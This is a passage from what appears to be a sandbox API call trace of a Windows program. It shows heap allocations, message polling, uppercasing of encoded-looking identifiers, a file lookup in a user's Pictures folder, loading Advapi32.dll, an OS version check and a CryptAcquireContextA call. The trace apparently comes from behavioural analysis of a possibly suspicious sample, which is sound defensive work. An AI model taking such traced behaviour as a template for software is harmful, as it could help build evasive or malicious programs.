Size=0x8) returned 0x2a71b48 [0210.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0210.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.368] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Hv6N_Hm7BbFlazd6N.gif", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e0fe100, ftCreationTime.dwHighDateTime=0x1d5d14f, ftLastAccessTime.dwLowDateTime=0x9926a460, ftLastAccessTime.dwHighDateTime=0x1d5cbc5, ftLastWriteTime.dwLowDateTime=0x9926a460, ftLastWriteTime.dwHighDateTime=0x1d5cbc5, nFileSizeHigh=0x0, nFileSizeLow=0x3cf9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hv6N_Hm7BbFlazd6N.gif", cAlternateFileName="HV6N_H~1.GIF")) returned 0x9e1bf8 [0210.368] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0210.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0210.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.368] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0210.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0210.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0210.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0210.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0210.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0210.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0210.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0210.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.371] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.371] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0210.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.371] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.371] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0210.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.371] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0210.371] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.372] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.372] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.372] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.372] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0210.372] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0210.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.373] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.373] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0210.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0210.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.373] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.373] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.373] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0210.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0210.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.374] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.374] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0210.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0210.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.374] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0210.374] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0210.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.374] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.374] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.374] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.375] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.375] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0210.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0210.375] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.375] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.375] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.375] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.375] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.375] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.375] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0210.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0210.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f40, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0210.376] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c2a8) returned 1 [0210.376] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.376] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.376] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0210.376] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.376] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0210.376] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.376] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.376] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.376] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.377] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.377] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.377] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.377] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.377] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.378] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.378] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.378] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.378] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.378] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.378] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.378] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.378] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0210.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.378] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0210.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.378] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.378] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.378] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.378] PeekMessageW (in: lpMsg=0x8cf158, 